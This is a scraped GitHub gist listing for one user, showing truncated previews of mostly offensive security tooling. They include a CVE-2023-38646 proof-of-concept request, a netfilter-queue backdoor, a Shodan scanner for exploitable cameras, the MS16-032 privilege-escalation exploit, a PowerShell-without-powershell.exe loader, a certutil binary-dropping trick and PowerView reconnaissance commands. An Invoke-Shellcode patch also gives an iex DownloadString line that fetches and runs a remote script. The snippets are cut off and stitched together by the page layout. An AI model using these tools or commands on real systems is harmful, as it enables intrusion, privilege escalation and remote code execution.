// https://github.com/irontec/netfilter-nfqueue-samples/blob/master/sample-helloworld.c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <linux/types.h>
#include <linux/netfilter.h>
#include <libnetfilter_queue/libnetfilter_queue.h>
eniac888
eniac888
/ cve-2023-38646_poc.txt
Created
July 28, 2023 08:31
— forked from testanull/cve-2023-38646_poc.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/setup/validate HTTP/1.1 | |
| Host: localhost:3000 | |
| Content-Length: 416 | |
| Accept: application/json | |
| Content-Type: application/json | |
| User-Agent: Mozilla/5.0 | |
| Connection: close | |
| {"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{ | |
| "subprotocol":"h2", |
eniac888
/ nfqueue_backdoor.md
Created
September 14, 2022 01:26
— forked from leveryd/nfqueue_backdoor.md
nfqueue_backdoor.c
eniac888
/ camscan.py
Created
December 19, 2016 10:35
scans for netcam exploidable cameras. requires shodan lib and API Key
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from shodan import WebAPI | |
| import re,socket | |
| key = 'YOURKEYHERE' | |
| filter = 'netcam' | |
| def checkCam(ip): | |
| try: | |
| sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
| sock.settimeout(1.5) |
eniac888
/ gist:5b95faab98b7cabf81107b87b2c36e21
Created
September 5, 2016 15:10
— forked from nickfloyd/gist:1046526
Powershell basic authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //This returns a 404 not found - powershell; I expected a 401 if my creds were bad | |
| $Url = "https://github.com/api/v2/xml/commits/list/fellowshiptech/portal/Portal_2011.6.23_15-26" | |
| $webclient = new-object system.net.webclient | |
| $webclient.credentials = new-object system.net.networkcredential("user", "password") | |
| $result = $webclient.DownloadString($Url) | |
| $result | |
| //This returns the data I want via terminal | |
| curl -u user:password https://github.com/api/v2/xml/commits/list/fellowshiptech/portal/Portal_2011.6.23_15-26 |
eniac888
/ hid_ntevent_wmi_event_subscription
Created
August 4, 2016 08:30
— forked from vector-sec/hid_ntevent_wmi_event_subscription
An example of how to use permanent WMI event subscriptions to log that a keyboard/mouse was connected to the windows event log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Based off @mattifestation's example: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a | |
| # Define the signature - i.e. __EventFilter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'HumanInterfaceDevice' | |
| Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA "Win32_PointingDevice" OR TargetInstance ISA "Win32_KeyBoard"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $InstanceArgs = @{ |
eniac888
/ MS16-032.ps1
Created
July 7, 2016 10:03
— forked from michael-bey/MS16-032.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-MS16-032 { | |
| <# | |
| .SYNOPSIS | |
| PowerShell implementation of MS16-032. The exploit targets all vulnerable | |
| operating systems that support PowerShell v2+. Credit for the discovery of | |
| the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script. | |
| Modifications by Mike Benich (@benichmt1). | |
| Targets: |
eniac888
/ EmpireCOMPosh.cs
Created
May 12, 2016 16:02
Allows PowerShell Commands To Execute via JavaScript via COM. PowerShell without PowerShell.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; |
eniac888
/ Invoke-Shellcode-Proxy
Created
May 7, 2016 16:58
— forked from hatRiot/Invoke-Shellcode-Proxy
Invoke-Shellcode proxy-aware
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # apply to Invoke-Shellcode.ps1 | |
| # invoke with: | |
| # PS > $wc = New-Object Net.WebClient ; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials ; iex $wc.DownloadString("http://host/Invoke-Shellcode.ps1") | |
| 596,599c596 | |
| < | |
| < $proxy = [System.Net.WebRequest]::GetSystemWebProxy() | |
| < $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials | |
| < | |
| --- |
eniac888
/ drop_binary.bat
Created
April 29, 2016 05:14
— forked from mattifestation/drop_binary.bat
Drop binary data from the command line w/o needing PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo -----BEGIN CERTIFICATE----- > encoded.txt | |
| echo Just Base64 encode your binary data | |
| echo TVoAAA== >> encoded.txt | |
| echo -----END CERTIFICATE----- >> encoded.txt | |
| certutil -decode encoded.txt decoded.bin |
eniac888
/ PowerView-2.0-tricks.ps1
Created
April 22, 2016 05:42
— forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server | |
| Get-NetLocalGroup -Recurse SERVER.domain.local | |
| # retrieve all the computers a GPP password applies to |
NewerOlder